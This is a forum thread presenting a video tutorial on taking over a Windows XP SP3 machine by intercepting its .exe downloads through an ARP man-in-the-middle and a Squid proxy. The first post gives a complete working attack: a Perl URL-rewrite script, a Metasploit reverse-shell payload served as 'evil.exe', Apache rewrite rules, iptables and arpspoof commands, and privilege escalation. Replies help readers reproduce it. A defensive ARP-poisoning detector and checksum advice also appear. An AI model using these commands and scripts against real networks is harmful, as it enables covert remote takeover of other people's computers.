
Thread: [Video] Owning Windows (XP SP3 vs. Squid)


  1. #1
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    [Video] Owning Windows (XP SP3 vs. Squid)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4862927/
    Download video: http://www.mediafire.com/?l7gezd8ai263a72
    Download Script (replace.pl): http://www.mediafire.com/?nheqdn6h4i6w17k


    Brief Overview
    This screencast demonstrates hijacking applications while they are being downloaded from the Internet and replacing the program with a meterpreter agent instead. The files can be downloaded either by the target or by another program (for example, self-updating programs).

    The attacker takes control of the traffic by performing a “Man In The Middle” (MITM) attack to analyse the traffic, in which, if the requested file ends in ".exe", the request is redirected to the attacker's web server, which always replies with the agent under the requested filename, creating the illusion that it was the requested file.

    Please note: unlike the two previous videos, where the attacker targeted programs/services that come with the Operating System, here the attacker pursues 3rd-party applications, or rather the process of trying to install them. As a result, more user interaction is needed than before, where it was either very little (visiting any web page) or nothing at all. Therefore the attacker needs the target to perform a certain action (either willingly or unknowingly).
    The chosen attack can be performed by a simpler method; however, this method was chosen with future posts in mind.


    Scenario/Setup
    This is the third video in a series of attacking Operating Systems, and our target has now updated to Windows XP Service Pack 3 in the hope of better security, after becoming compromised... twice.

    After spending hours re-formatting, installing and restarting, the target is using a fully up-to-date Windows XP SP3 system with the latest security patches as of March 2011. They haven't used their system "much": every setting is still at its default and they haven't installed any programs such as Anti-Virus, Firewalls or any browser-based applications (e.g. Flash or Java).

    This time around, the attacker approaches the attack by attacking the process of installing new or updating existing software.


    What was needed?

    • Nmap – (Can be found in BackTrack 4-R2)
    • PostgreSQL – (Can be found in BackTrack 4-R2)
    • Metasploit – (Can be found in BackTrack 4-R2)
    • Apache – (Can be found in BackTrack 4-R2)
    • A Text Editor – (Kate can be found in BackTrack 4-R2)
    • Squid – (Can be found in the BackTrack repository)
    • arpspoof – (Part of the DSniff suite, which can be found in BackTrack 4-R2)



    replace.pl
    Code:
    #!/usr/bin/perl
    ########################################################################
    # replace.pl         --- Squid Script (Application replacement)        #
    # g0tmi1k 2011-03-09                                                   #
    ########################################################################
    use strict;
    use warnings;
    use IO::Handle;
    use File::Basename;
    
    $|=1;                          # unbuffered STDOUT: Squid reads each reply line as soon as it is written
    my $ourIP = "192.168.0.33";    # attacker's web server (Apache + .htaccess rewrite)
    my $debug = 0;
    
    # Only open (and autoflush) the debug log when debugging is on; the original
    # called autoflush on DEBUG even when the handle had never been opened.
    my $dbg;
    if ($debug == 1) {
       open ($dbg, '>>', '/tmp/replace_debug.log') or die "open: $!";
       $dbg->autoflush(1);
    }
    
    # Squid hands the url_rewrite_program one request per line (URL first, then
    # client address, ident and method) and expects exactly one line back per request.
    while (<>) {
       chomp $_;
       if ($_ =~ /(.*\.exe)/i) {
          # log the raw input line ($url was still unset at this point in the original)
          if ($debug == 1) { print $dbg "Input: $_\n"; }
          my $url = $1;
          my $filename = basename( $url );
          my $new_url = "http://$ourIP/$filename";
          print "$new_url\n";
          if ($debug == 1) { print $dbg "Filename: $filename\nOutput: $new_url\n"; }
       }
       else {
          print "$_\n";            # not an .exe: echo the line back so Squid keeps the original URL
       }
    }
    Method

    • Start network services and obtain an IP address
    • Create resource file and agent for metasploit
    • Start and configure metasploit to listen for the backdoor
    • Configure and start apache web server
    • Download, install and configure Squid proxy
    • Perform a man in the middle attack
    • Wait for target to download a program (either willingly or unknowingly)
    • Game Over



    Commands:
    Code:
    start-network
    dhclient eth0
    /etc/init.d/postgresql-8.3 start
    clear
    
    nmap 192.168.0.* -n -sn -sP
    nmap 192.168.0.103 -T4 -O -v
    clear
    
    echo "client.railgun.user32.MessageBoxA(0,\"Corrupt file. Please re-download\",\"Setup\",\"MB_OK\")" > /root/replace.rb
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.33 LPORT=4444 X > /var/www/evil.exe 
    export GOCOW=1     # Always cow logo ;)
    msfconsole
    use multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 0.0.0.0
    set ExitOnSession false
    set AutoRunScript /root/replace.rb
    show options
    exploit -j
    
    #kate -> New
    Options +FollowSymlinks
    RewriteEngine on
    RewriteRule ^(.*) evil.exe
    # Save: /var/www/.htaccess
    #kate -> Open: /etc/apache2/sites-enabled/000-default
    #Edit (Line 11): AllowOverride All
    #Save
    start-apache   # /etc/init.d/apache2 start
    
    apt-cache search squid
    apt-get install squid3
    y
    update-rc.d -f squid3 remove
    
    kate -> Open: /etc/squid3/squid.conf
    Edit (Line 588): acl localnet src 192.168.0.0/16
    Edit (Line 644): http_access allow localnet
    Edit (Line 868): http_port 3128 transparent
    Add (Line: *end*): url_rewrite_program /root/replace.pl
    Save
    kate -> Open: /root/replace.pl
    chmod 755 /root/replace.pl
    /etc/init.d/squid3 restart
    
    iptables --table nat --append PREROUTING --in-interface eth0 --proto tcp --destination-port 80 --jump REDIRECT --to-port 3128
    echo 1 > /proc/sys/net/ipv4/ip_forward
    #cat /proc/sys/net/ipv4/ip_forward
    #Start -> run -> cmd -> arp -a
    arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
    #Start -> run -> cmd -> arp -a
    
    IE -> http://www.filehippo.com -> Search: flash. Download & Run
    
    sessions -l -v
    #Kill arpspoof
    
    IE -> http://www.filehippo.com -> Search: notepad++. Download Older & Run
    
    arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
    
    Notepad++ -> ? -> Check for updates
    
    #Kill arpspoof
    sessions -l -v
    sessions -i 2
    sysinfo
    getuid
    getsystem
    getuid
    Last edited by g0tmi1k; 03-10-2011 at 08:14 PM.
    Have you...g0tmi1k?

  2. #2
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] Owning Windows (XP SP3 vs. Squid)

    Walk-through
    The attacker once again starts off by doing a quick sweep of the network with nmap and, after identifying the target, proceeds to port scan it. However, this time around no ports respond (due to the firewall now being enabled by default), which limits the information returned.

    The attacker then moves on to creating a resource file for metasploit which, using railgun, calls a simple Windows API function to display a message box; this gives the target feedback that the program has executed, rather than leaving them wondering what’s happening.
    The attacker continues with metasploit by creating the agent and configuring metasploit to listen for a connection back to it, setting the resource script to execute automatically once a connection has been created.

    The attacker proceeds by setting up an Apache web server, which is used to deliver the agent to the user. The attacker enables and creates a "distributed configuration file" (.htaccess) that maps any requested URL to the metasploit agent, returning it under the same name as requested.

    As the attacker now has a backdoor and a delivery system ready, they need a method of filtering the web traffic: a rule that redirects any requested URL ending in EXE (a very common application extension in a Windows environment) to the attacker's web server instead. The attacker installs the Squid3 caching proxy, which can do this via a perl script (replace.pl).
    Ettercap could also have been used as an alternative solution; however, due to its limited scripting functionality the results weren't as good.

    As everything is now ready, the attacker just needs to redirect the traffic via their machine. Like before, the attacker performs an ARP man in the middle attack with the aid of arpspoof.

    Everything is in place and ready for the target to request a program. This can be done either by the target requesting it themselves (visiting a site and downloading it "manually") or by a program that is already installed (it checks for an update, finds that one is available and automatically downloads & executes the program).

    After waiting, the attacker notices that a session has been created and is able to stop the man in the middle attack, as the attacker no longer needs the target's traffic now that they have a direct connection to the target.

    A simple bit of privilege escalation gives the attacker complete access to the target's machine.



    Notes:

    • The recording software glitched in a few places, so I re-recorded a section and edited it in.
    • The first time the target tries to download an application, they click on the notification bar at the top rather than re-clicking on the link.
    • Adobe Flash's official web site detects the browser agent and uses a different delivery system to install, which wouldn't have worked in the default browser (Internet Explorer).
    • Not every auto-update feature uses ".exe" files to update.
    • It is recommended to check the checksum (e.g. MD5 or SHA1) of downloaded programs before executing them.
    • It is recommended to only download from the official sites, sources or mirrors. Flash was downloaded from adobe.com (filehippo redirects to it), whereas notepad++ was hosted on filehippo.com.


    Song: Free Your Soul - Command Strange & Strings Track (Apex Remix) - Bachelors of Science
    Video length: 10:00
    Capture length: 34:11

    Blog Post: http://g0tmi1k.blogspot.com/2011/03/video-owning-windows-xp-sp3-vs-squid.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38565-%5Bvideo%5D-owning-windows-xp-sp3-vs-squid.html#post191335
    Have you...g0tmi1k?
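The command list in the first post checks the target's ARP table (`arp -a`) before and after arpspoof runs. The following Python script, added here as an example and not part of the video or g0tmi1k's scripts, automates that comparison on constructed Windows `arp -a` output: it flags a gateway whose MAC address has changed from the baseline and any MAC claimed by more than one IP, which is what a poisoned gateway entry looks like from the victim's side.

```python
import re
from typing import Dict, List

# Constructed Windows "arp -a" output for the target (not captured from the video).
# Baseline: gateway 192.168.0.1 and host 192.168.0.33 each have their own MAC.
ARP_BEFORE = """\
Interface: 192.168.0.103 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-11-22-aa-bb-01     dynamic
  192.168.0.33          00-11-22-aa-bb-33     dynamic
"""

# Same host after the gateway entry has been poisoned: 192.168.0.1 now resolves
# to the MAC already used by 192.168.0.33, so both IPs share one physical address.
ARP_AFTER = """\
Interface: 192.168.0.103 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-11-22-aa-bb-33     dynamic
  192.168.0.33          00-11-22-aa-bb-33     dynamic
"""

# One table row: IPv4 address, then a dash-separated MAC; header lines never match.
ENTRY_RE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\b", re.I)


def parse_arp(text: str) -> Dict[str, str]:
    """Map each IP in `arp -a` output to its MAC (lower-cased)."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def check_arp(baseline: Dict[str, str], current: Dict[str, str], gateway: str) -> List[str]:
    """Return findings: a changed gateway MAC, and any MAC claimed by several IPs."""
    findings: List[str] = []
    if gateway in baseline and gateway in current and baseline[gateway] != current[gateway]:
        findings.append(f"gateway {gateway} MAC changed {baseline[gateway]} -> {current[gateway]}")
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in current.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claimed by {', '.join(sorted(ips))}")
    return findings


if __name__ == "__main__":
    for finding in check_arp(parse_arp(ARP_BEFORE), parse_arp(ARP_AFTER), "192.168.0.1"):
        print(finding)
```

Taking the baseline snapshot before joining an untrusted network and re-running the check periodically turns the manual `arp -a` glance from the video into a repeatable detection; a static ARP entry for the gateway is the corresponding mitigation.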

  3. #3
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Re: [Video] Owning Windows (XP SP3 vs. Squid)

    I can't wait to play with this. This is another project I started but couldn't get to work. Now I can see what I was doing wrong.

    Thanks
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  4. #4
    Just burned his ISO
    Join Date
    Mar 2011
    Posts
    1

    Re: [Video] Owning Windows (XP SP3 vs. Squid)

    Thanks for this new tutorial
    You're doing a good job, thanks

    I tried to follow it but I've one error when I download Flash from fileHippo: "ERROR The requested URL could not be retrieved.
    While trying to retrieve the URL: http//[AttackerURL]/flashplayer10-3_b1_activex_030811.exe
    The following error was encountered:
    Connection to [Attacker IP] Failed
    The system returned: (113) No route to host."

    It seems I've failed the squid configuration, or the script setting.
    I'll try to restart from the beginning, but if you have the solution...

    One more time, thanks for these tutorials

  5. #5
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] Owning Windows (XP SP3 vs. Squid)

    Quote Originally Posted by Scamentology
    I can't wait to play with this. This is another project I started but couldn't get to work. Now I can see what I was doing wrong.

    Thanks
    Hehe! Best of luck with it! Hope you have more success with it now



    Quote Originally Posted by Anaxag0re
    Thanks for this new tutorial
    You're doing a good job, thanks

    I tried to follow it but I've one error when I download Flash from fileHippo: "ERROR The requested URL could not be retrieved.
    While trying to retrieve the URL: http//[AttackerURL]/flashplayer10-3_b1_activex_030811.exe
    The following error was encountered:
    Connection to [Attacker IP] Failed
    The system returned: (113) No route to host."

    It seems I've failed the squid configuration, or the script setting.
    I'll try to restart from the beginning, but if you have the solution...

    One more time, thanks for these tutorials
    Thanks for the thanks!
    What happens when you try to do it locally on the attacker's machine?
    That error is linked to squid.... Is the target on the same subnet? You may need to change
    "Edit (Line 588): acl localnet src 192.168.0.0/16"
    to fit your IPs.
    Have you...g0tmi1k?
